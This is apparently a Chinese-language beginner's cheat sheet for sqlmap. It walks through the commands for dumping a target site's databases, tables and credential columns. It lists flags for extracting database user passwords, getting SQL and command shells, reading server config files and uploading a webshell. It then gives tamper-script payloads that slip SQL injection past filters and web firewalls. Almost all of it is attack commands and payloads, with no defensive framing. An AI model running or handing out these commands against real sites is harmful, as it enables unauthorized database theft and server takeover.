0x001 小白用法
- 常用的爆庫爆表爆字段
sqlmap.py -u “url” –dbs 假設爆出的數據庫,名爲db1
sqlmap.py -u “url” -D db1 –tables 假設爆出的表爲ta1.(ps:假設只有這一個表)
sqlmap.py -u “url” -D db1 -T ta1 –clomus 假設爆出的字段爲 id name pwd 那麼你可以這樣了
sqlmap.py -u “url” -D db1 -T ta1 –dump -C “id,name,pwd” 不出意外的話可以出結果了。。。
當然了,這只是最最簡單的用法了。。。 - 常用參數
-f 直接指定數據庫的類型
-b 數據庫的版本信息
–current-user 獲取當前的用
–users 列舉數據庫所有用戶
–isidba 查看是否是dba
–passwords 數據庫用戶所有密碼
–privileges 查看用戶的權限
–sql-shell 執行sql命令
–sql-cmd 執行cmd命令
–sql-query 執行自定義sql命令 和 –file-read 如果有讀權限可以讀取服務器的很多信息,比如數據庫的配置信息 中間件的配置信息等等 和–file-write配合使用,如果有寫權限 可直接上傳webshell
–file-read 如果當前用戶有讀權限,則可用此讀取服務器的配置信息
–file-write 如果當前用戶有些權限,則可執行上傳shell(絕對路徑)
0x002 tamper繞過淺見
apostrophemask 用utf8代替引號
Example: ("1 AND '1'='1") '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
equaltolike 使用like代替等號。
Example:Input: SELECT * FROM users WHERE id=1 Output: SELECT * FROM users WHERE id LIKE 1
greadtest 繞過過濾的’>’ 用GREATEST代替大於號
Example: ('1 AND A > B') '1 AND GREATEST(A,B+1)=A' Tested against: * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.
space2hash 用空格替換爲#號 隨機字符串 以及換行符
Example:
Input: 1 AND 9227=9227Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
apostrophenullencode 繞過過濾雙引號 替換子符和雙引號
example
tamper("1 AND '1'='1") '1 AND %00%271%00%27=%00%271'
適用於 mysql4.5.0 和5.5 oracle 10g postgresql8.3 8.4 9.0
halfversionedmorekeywords 當數據庫爲mysql時,繞過防火牆,每個關鍵字之前添加mysql版本評論
example
("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa") "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
適用於 mysql<5.1
space2morehash 空格替換爲#以及更多的隨機字符串 換行符
example
Input: 1 AND 9227=9227 Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
等等了。。。。。。
0XX3 隨後再補